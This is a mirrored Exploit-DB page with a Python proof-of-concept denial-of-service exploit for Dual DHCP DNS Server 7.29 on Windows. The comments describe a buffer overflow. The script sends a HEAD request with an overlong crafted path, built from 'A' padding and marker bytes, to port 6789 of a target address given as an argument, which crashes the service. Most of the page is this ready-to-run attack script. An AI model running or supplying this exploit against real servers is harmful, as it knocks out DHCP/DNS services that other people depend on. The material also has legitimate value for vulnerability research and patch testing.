Dual DHCP DNS Server 7.29 – Denial of Service - 体验盒子

作者： R-73eN

日期： 2016-12-07

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/40885/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

# Title :Dual DHCP DNS Server 7.29 Buffer Overflow (Dos)

# Date : 07/12/2016

# Author : R-73eN

# Tested on: Dual DHCP DNS Server 7.29 on Windows 7 SP1 (32bit)

# Vendor : http://dhcp-dns-server.sourceforge.net/

# Software : https://sourceforge.net/projects/dhcp-dns-server/files/Dual%20DHCP%20DNS%20Server/DualServerInstallerV7.29.exe/download

# Vulnerability Description:

# The software crashes when it tries to write to an invalid address.

#

# MOV EBX,DWORD PTR SS:[EBP+8] -> EBP+8 is part of our controlled input

# MOV DWORD PTR SS:[ESP+4],31

# MOV DWORD PTR SS:[ESP],1

# .........................

# MOV DWORD PTR DS:[EBX+24],EAX -> Here happens the corruption, EAX fails to move EBX which is our controlled adress + 24 bytes.

#

# I think this vulnerability is not exploitable because every module that is loaded has ASLR/DEP/SAFESEH enabled (Win 7)

# Even if we try to put some valid pointers to manipulate the execution flow we can't because every address on the DualServ.exe

# contains 00 which is a badchar in our case.

#

import socket

import time

import sys

banner = "\n\n"

banner +="_________ __\n"

banner +=" |_ _|_ __/ _| ___/ ___| ___ _ __/ \| |\n"

banner +="| || '_ \| |_ / _ \| |_ / _ \ '_ \/ _ \ | |\n"

banner +="| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___ \n"

banner +=" |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____|\n\n"

print banner

host = ""

port = 6789

def send_request(host,port,data):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

s.connect((host,port))

s.send(data)

print "[+] Malicious Packet Sent [+]\n"

except Exception:

print "[+] Exploit failed . . .[+]\n"

s.close()

ebx = "BBBB"

eax = "CCCC"

evil = "A" * 497 + eax + "AAAA" + ebx + "D" * 400

if(len(sys.argv) < 1):

print '\n Usage : exploit.py ipaddress\n'

exit(0)

else:

host = sys.argv[1]

#The method doesn't really matters. It gets valideted only about the length

request = "HEAD /{REPLACE} HTTP/1.1\r\nHost: " + str(host) + "\r\nUser-agent: Fuzzer\r\n\r\n"

send_request(host,port,request.replace("{REPLACE}",evil))